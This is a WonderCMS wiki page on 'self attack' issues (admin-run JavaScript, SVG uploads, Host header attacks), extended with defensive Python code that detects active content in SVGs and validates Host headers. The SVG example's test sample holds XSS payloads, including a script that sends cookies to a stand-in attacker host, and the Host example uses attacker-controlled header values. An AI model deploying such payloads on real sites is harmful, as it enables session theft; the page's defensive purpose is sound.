[Self attack vulnerabilities] possibilities list
Robert Isoski edited this page Feb 10, 2020 · 2 revisions
The issues below apply only if an admin is logged in and is tricked into pasting JavaScript code or uploading SVGs.
WonderCMS comes with some security features and some responsibilities.
1. A logged-in user (admin) can execute JavaScript anywhere on their website.
- This has always been a WonderCMS feature.
- I personally don't consider that this needs fixing, since a logged-in admin can do much more damage than just XSS attacks (including website defacement, malware distribution, cryptominers, ...)
2. A logged-in user can upload an SVG containing more than image data, such as JavaScript.
- SVGs are not just images: they are XML documents and can also embed code such as JavaScript. These are useful features of SVG.
- Sanitizing SVGs would partially kill their functionality.
- If there are enough requests for it, SVG uploading can be removed from WonderCMS entirely.
- If JavaScript is already allowed to run in any part of the CMS, would removing SVG uploading make any difference?
3. Host header attack.
- This will not be considered a vulnerability until a live (non-local) exploit is shown.
- Using Burp Suite to create/show a local attack is not enough; there needs to be a way to exploit a WonderCMS installation remotely, not just to attack one's own local installation.
Admin responsibilities:
- Avoid pasting random JavaScript code.
- Avoid uploading random SVGs.
- Install themes and plugins only from wondercms.com.
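As an added illustration of point 2 (this is example code, not WonderCMS's own upload handling): a server-side accept/reject check for an uploaded SVG. It flags `<script>` and foreign-content elements, `on*` event-handler attributes, `javascript:` URLs (including ones obfuscated with character references, which the XML parser decodes), and `data:` URLs that are not plain raster images. A clean SVG is stored unchanged, so it avoids the feature loss that rewriting/sanitizing would cause. The two SVG samples are constructed for this example; the function and constant names are the example's own.

```python
"""Flag active content in an uploaded SVG before accepting the file.

Accept-or-reject check, not a sanitizer: a clean SVG is kept byte-for-byte,
so none of its legitimate features are lost.
"""
import xml.etree.ElementTree as ET

# Elements that run script or embed non-SVG content.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# URL schemes that execute when used in href / to / values attributes.
SCRIPT_SCHEMES = ("javascript:", "vbscript:")
# data: URLs are accepted only for plain raster images (nested SVG/HTML can carry script).
SAFE_DATA_PREFIXES = ("data:image/png", "data:image/jpeg", "data:image/gif", "data:image/webp")


def _local(name: str) -> str:
    """Strip an XML namespace prefix ('{uri}href' -> 'href') and lowercase."""
    return name.rsplit("}", 1)[-1].lower()


def _normalise_url(value: str) -> str:
    """Browsers ignore whitespace and control characters inside a scheme,
    so 'java\\tscript:' still runs; drop them before comparing."""
    return "".join(ch for ch in value if ord(ch) > 32).lower()


def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing active was found.

    xml.etree does not fetch external entities, but for untrusted input in
    production prefer defusedxml, which also blocks entity-expansion bombs.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):                    # onload, onclick, onbegin, ...
                findings.append(f"event handler {name} on <{tag}>")
                continue
            url = _normalise_url(value)
            if url.startswith(SCRIPT_SCHEMES):
                findings.append(f"{url.split(':', 1)[0]}: URL in {name} on <{tag}>")
            elif url.startswith("data:") and not url.startswith(SAFE_DATA_PREFIXES):
                findings.append(f"non-image data: URL in {name} on <{tag}>")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    """True when the upload can be stored as-is."""
    return not find_active_content(svg_bytes)


# Constructed sample inputs (not real uploads).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="red"/>
  <image href="data:image/png;base64,iVBORw0KGgo=" width="1" height="1"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
  <rect width="10" height="10" onload="alert(1)"/>
  <a xlink:href="java&#x73;cript:alert(1)"><text y="10">click me</text></a>
  <set attributeName="href" to="ja&#x76;ascript:alert(2)"/>
</svg>"""

if __name__ == "__main__":
    for label, data in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, "->", find_active_content(data) or "clean")
```

The check runs at upload time, so it addresses the "tricked into uploading a file you cannot read" case; it does nothing about SVG markup an admin pastes inline into a page, which the page treats as accepted behaviour. A second, independent mitigation for stored SVGs is to serve uploads from a separate origin or with `Content-Disposition: attachment`, so that even an SVG that slips through cannot run in the site's own origin.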
The list above is subject to change. All discussions are welcome. Reporting the issues above will not qualify you for the WonderCMS reward system.
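Whatever the verdict on point 3, the mechanism behind a Host header attack is that a link the application generates (a password-reset link, a canonical URL, a redirect) is built from the client-controlled `Host` header, so an attacker who can get a victim to request such a link receives it at their own domain. The example below, added here and not taken from WonderCMS, shows the trusting pattern next to the allowlist check that removes it. `ALLOWED_HOSTS`, `CANONICAL_HOST`, the request dictionaries and the `/reset-password` path are all constructed for the example; in PHP the corresponding input is `$_SERVER['HTTP_HOST']`.

```python
"""Build absolute URLs without trusting the client-supplied Host header.

Constructed WSGI-style environ dicts stand in for real requests.
"""
from urllib.parse import urlunsplit

# Assumption: the hostnames this site is legitimately served under.
ALLOWED_HOSTS = {"www.example.com", "example.com"}
CANONICAL_HOST = "www.example.com"


def host_from_header(raw: str) -> str:
    """Normalise a Host value: trim, lowercase, drop an explicit port."""
    host = raw.strip().lower()
    if host.startswith("["):                      # IPv6 literal, e.g. [::1]:8080
        return host.split("]", 1)[0] + "]"
    name, sep, port = host.rpartition(":")
    return name if sep and port.isdigit() else host


def absolute_url_unsafe(environ: dict, path: str) -> str:
    """The pattern a Host-header probe looks for: whatever the client sent
    (or a proxy header the client can forge) ends up in a link we generate."""
    host = environ.get("HTTP_X_FORWARDED_HOST") or environ["HTTP_HOST"]
    return urlunsplit((environ["wsgi.url_scheme"], host, path, "", ""))


def absolute_url_safe(environ: dict, path: str,
                      allowed=ALLOWED_HOSTS, canonical=CANONICAL_HOST) -> str:
    """Use the request host only if it is one we actually serve; otherwise
    fall back to the configured canonical host. X-Forwarded-Host is ignored
    here; honour it only when a trusted reverse proxy sets it, and validate it too."""
    host = host_from_header(environ.get("HTTP_HOST", ""))
    if host not in allowed:
        host = canonical
    return urlunsplit((environ["wsgi.url_scheme"], host, path, "", ""))


# Constructed requests: a normal one and two with attacker-controlled host values.
NORMAL_REQUEST = {"wsgi.url_scheme": "https", "HTTP_HOST": "Example.COM:443"}
POISONED_REQUEST = {"wsgi.url_scheme": "https", "HTTP_HOST": "attacker.example"}
FORWARDED_REQUEST = {"wsgi.url_scheme": "https", "HTTP_HOST": "www.example.com",
                     "HTTP_X_FORWARDED_HOST": "attacker.example"}
RESET_PATH = "/reset-password"   # hypothetical link the application emails out

if __name__ == "__main__":
    for label, req in (("normal", NORMAL_REQUEST), ("poisoned", POISONED_REQUEST),
                       ("forwarded", FORWARDED_REQUEST)):
        print(f"{label:9} unsafe: {absolute_url_unsafe(req, RESET_PATH)}")
        print(f"{label:9} safe:   {absolute_url_safe(req, RESET_PATH)}")
```

The distinction the page draws (local Burp demonstration versus remote exploit) maps onto what the generated link is used for: rewriting your own response is harmless, while a reset or login link that a victim receives by e-mail, or a cached page that other visitors are served, turns the same header into a remote problem. The allowlist check is cheap enough to apply either way.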
Comments

Trying to think of a reason to counter myself: should we remove the SVG uploading functionality, and why?
- even if we remove SVG uploading, users can still inline SVGs in HTML, which is a good thing
- this way we can prevent users from being "tricked" into uploading malicious SVGs onto their site, since they can't see the SVG content (if someone tricks them).
Please share your opinion on this topic. TL;DR: remove SVG uploading or not? (Even if we remove it, users can still inline SVGs.)
- please note we would still support executing JavaScript in any part of WonderCMS, as we already do.